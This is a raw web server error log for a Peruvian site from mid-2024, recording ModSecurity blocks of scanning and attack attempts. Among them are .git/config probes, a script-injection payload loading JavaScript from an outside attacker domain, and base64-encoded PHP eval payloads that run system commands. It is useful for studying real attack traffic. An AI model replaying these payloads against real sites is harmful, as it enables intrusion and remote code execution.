[error] 17366#17366: *230517 access forbidden by rule, client: 172.105.197.17, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Jul 29 00:45:31.717118 2024] [authz_core:error] [pid 17534:tid 140050763314944] [client 139.162.96.14:47276] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/29 00:45:33 [error] 17367#17367: *230538 access forbidden by rule, client: 23.239.21.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/07/29 00:45:37 [error] 17366#17366: *230551 access forbidden by rule, client: 139.162.96.14, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/29 07:35:47 [error] 17090#17090: *233911 access forbidden by rule, client: 213.152.176.252, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/29 07:35:47 [error] 17091#17091: *233926 access forbidden by rule, client: 213.152.176.252, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" [Mon Jul 29 13:18:14.248613 2024] [autoindex:error] [pid 17233:tid 140004676278016] [client 20.171.249.94:58170] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/07/29 15:30:17 [error] 17090#17090: *238290 access forbidden by rule, client: 179.43.188.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jul 30 10:42:53.787687 2024] [:error] [pid 1727:tid 139755064841984] [client 179.43.191.18:52820] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZqkJ_d33wrhfz-IWvILGIwAAAJM"], referer: http://investigacionperu.com [Tue Jul 30 13:36:48.640344 2024] [authz_core:error] [pid 1725:tid 139755048056576] [client 167.99.210.137:56878] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/30 13:36:53 [error] 1589#1589: *253513 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jul 30 17:07:10.182991 2024] [authz_core:error] [pid 1727:tid 139755115198208] [client 68.183.180.73:34116] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/30 17:07:16 [error] 1589#1589: *256998 access forbidden by rule, client: 68.183.180.73, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 30 22:55:53.776390 2024] [autoindex:error] [pid 2346:tid 139755064841984] [client 68.183.95.185:42250] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 30 22:56:24.352987 2024] [autoindex:error] [pid 2346:tid 139755190732544] [client 68.183.95.185:42344] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jul 31 21:11:48.447155 2024] [authz_core:error] [pid 4872:tid 140430633056000] [client 192.46.211.230:40392] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/31 21:11:53 [error] 4836#4836: *274908 access forbidden by rule, client: 192.46.211.230, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 31 21:14:00.505499 2024] [:error] [pid 4873:tid 140430557521664] [client 34.154.28.131:40426] [client 34.154.28.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZqrvaOixmCThJVZhQ316FwAAAJA"], referer: www.google.com [Wed Jul 31 21:14:13.958509 2024] [:error] [pid 4872:tid 140430490380032] [client 34.154.28.131:40432] [client 34.154.28.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZqrvdUw3rVm7fb_RHIsatQAAAFg"], referer: www.google.com [Thu Aug 01 08:46:14.399613 2024] [autoindex:error] [pid 6172:tid 140578180269824] [client 4.213.141.139:51596] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/08/01 09:01:33 [error] 5724#5724: *281386 access forbidden by rule, client: 54.91.13.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 01 15:26:38.166704 2024] [authz_core:error] [pid 5866:tid 140578138306304] [client 146.190.242.161:34316] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/01 15:26:41 [error] 5724#5724: *289055 access forbidden by rule, client: 146.190.242.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 01 16:00:28.299927 2024] [authz_core:error] [pid 5868:tid 140578205447936] [client 164.90.208.56:35308] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/01 16:00:32 [error] 5725#5725: *289419 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/01 18:34:42 [error] 5724#5724: *290887 access forbidden by rule, client: 36.70.230.234, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "www.investigacionperu.com" 2024/08/01 18:34:43 [error] 5724#5724: *290888 access forbidden by rule, client: 36.70.230.234, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 01 23:16:19.213550 2024] [authz_core:error] [pid 6172:tid 140578104735488] [client 206.189.19.19:42208] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/01 23:16:23 [error] 5724#5724: *293476 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 02 00:14:29.874644 2024] [authz_core:error] [pid 6172:tid 140578188662528] [client 64.227.32.66:43074] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/02 00:14:34 [error] 5725#5725: *294005 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/02 10:21:51 [error] 646#646: *299992 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/02 13:36:46 [error] 646#646: *301606 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/02 13:52:02 [error] 647#647: *301760 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/02 17:09:27 [error] 647#647: *304260 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/02 18:02:09 [error] 647#647: *304637 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/02 18:02:32 [error] 647#647: *304638 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Aug 02 23:53:28.645836 2024] [:error] [pid 688:tid 139745169643264] [client 185.211.6.82:37868] [client 185.211.6.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zq23yKXx_ct5FuYaGFMPqgAAAEU"], referer: www.google.com [Fri Aug 02 23:53:37.157091 2024] [:error] [pid 1321:tid 139744981759744] [client 185.211.6.82:37870] [client 185.211.6.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zq230bltZ9rrO8TSW6U2-AAAANM"], referer: www.google.com [Sat Aug 03 06:22:17.972224 2024] [:error] [pid 23101:tid 140296339793664] [client 45.227.254.34:44156] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/exs-church/fnc.php"] [unique_id "Zq4S6XBFXt7FOmrzyA5DKAAAAFA"] 2024/08/03 18:59:34 [error] 23059#23059: *318170 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/03 19:06:27 [error] 23060#23060: *318235 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/03 20:01:05 [error] 23059#23059: *318571 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 03 23:36:12.904936 2024] [:error] [pid 23102:tid 140296364971776] [client 89.248.172.92:60410] [client 89.248.172.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); ?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Zq8FPCeEF0I7Z6p5FQtlbQAAAI0"] [Sun Aug 04 03:05:23.034435 2024] [:error] [pid 23099:tid 140296381757184] [client 89.248.172.92:34952] [client 89.248.172.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); ?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Zq82Q4UUv1vsPUt5jn8nsgAAAAs"] [Sun Aug 04 05:03:10.213170 2024] [authz_core:error] [pid 14260:tid 140082756089600] [client 167.99.210.137:36488] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/04 05:03:14 [error] 14108#14108: *321606 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 04 05:24:57.028831 2024] [authz_core:error] [pid 14149:tid 140082739304192] [client 207.154.197.113:37188] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/04 05:25:01 [error] 14107#14107: *322047 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/05 02:23:37 [error] 14108#14108: *334447 access forbidden by rule, client: 23.227.203.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/05 02:23:39 [error] 14107#14107: *334468 access forbidden by rule, client: 23.227.203.105, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Aug 05 08:05:38.937181 2024] [:error] [pid 32291:tid 140255403386624] [client 89.248.174.11:39576] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); ?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZrDOIg-VkhofTQpDqFiHcQAAAc4"] [Mon Aug 05 16:00:22.478368 2024] [:error] [pid 26629:tid 140255344637696] [client 3.38.109.148:51272] [client 3.38.109.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Web Downloader"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/themes/zerif-lite/js/jquery.knob.js"] [unique_id "ZrE9ZmkYiVifRPIU-p4qJQAAABU"] [Mon Aug 05 18:29:13.544630 2024] [:error] [pid 27322:tid 140255378208512] [client 179.60.150.123:54572] [client 179.60.150.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); echo eval(base64_decode('ZWNobyAnW1NdJzsgc3lzdGVtKCd3aG9hbWknKTsgZWNobyAnW0VdJzs. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZrFgSQJ2frTEqBdtCu9PVwAAANE"] [Mon Aug 05 19:42:44.092855 2024] [:error] [pid 27322:tid 140255403386624] [client 5.188.86.10:56020] [client 5.188.86.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php phpinfo(); echo eval(base64_decode('ZWNobyAnW1NdJzsgc3lzdGVtKCd3aG9hbWknKTsgZWNobyAnW0VdJzs. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "ZrFxhAJ2frTEqBdtCu9P1gAAAM4"] [Mon Aug 05 19:47:25.007856 2024] [:error] [pid 32291:tid 140255436957440] [client 45.227.254.34:56114] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ZrFynQ-VkhofTQpDqFiH_gAAAco"] [Mon Aug 05 23:18:27.395544 2024] [autoindex:error] [pid 32173:tid 140255487313664] [client 31.220.76.143:58960] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 06 04:36:35.736316 2024] [authz_core:error] [pid 29183:tid 140696509949696] [client 206.81.24.74:36264] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/06 04:36:40 [error] 29147#29147: *353274 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/06 08:04:23 [error] 29146#29146: *355318 access forbidden by rule, client: 45.148.10.142, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/06 11:18:03 [error] 29147#29147: *357481 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/06 12:13:10 [error] 29146#29146: *358035 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/06 12:14:12 [error] 29147#29147: *358043 access forbidden by rule, client: 45.148.10.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 06 12:47:11.689102 2024] [authz_core:error] [pid 29185:tid 140696501556992] [client 207.154.197.113:44940] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/06 12:47:15 [error] 29147#29147: *358262 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/06 13:21:11 [error] 29146#29146: *358648 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/06 13:25:49 [error] 29146#29146: *358695 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Aug 06 14:34:21.362996 2024] [:error] [pid 29796:tid 140696568698624] [client 34.65.224.5:46600] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php, referer: www.google.com 2024/08/06 15:40:30 [error] 29147#29147: *359642 access forbidden by rule, client: 45.148.10.142, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Aug 06 16:55:25.996269 2024] [:error] [pid 29185:tid 140696610662144] [client 35.221.110.175:49022] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php, referer: www.google.com 2024/08/06 20:52:05 [error] 29147#29147: *362997 access forbidden by rule, client: 45.148.10.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/06 21:27:16 [error] 29146#29146: *363379 access forbidden by rule, client: 45.148.10.142, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/07 03:55:28 [error] 19649#19649: *367250 access forbidden by rule, client: 185.180.222.208, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Wed Aug 07 12:19:57.798323 2024] [autoindex:error] [pid 19692:tid 139674366482176] [client 4.213.112.139:41112] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 07 16:57:56.545542 2024] [autoindex:error] [pid 20349:tid 139674366482176] [client 143.244.131.112:46180] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/08/08 00:47:18 [error] 19649#19649: *378749 access forbidden by rule, client: 109.253.203.223, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 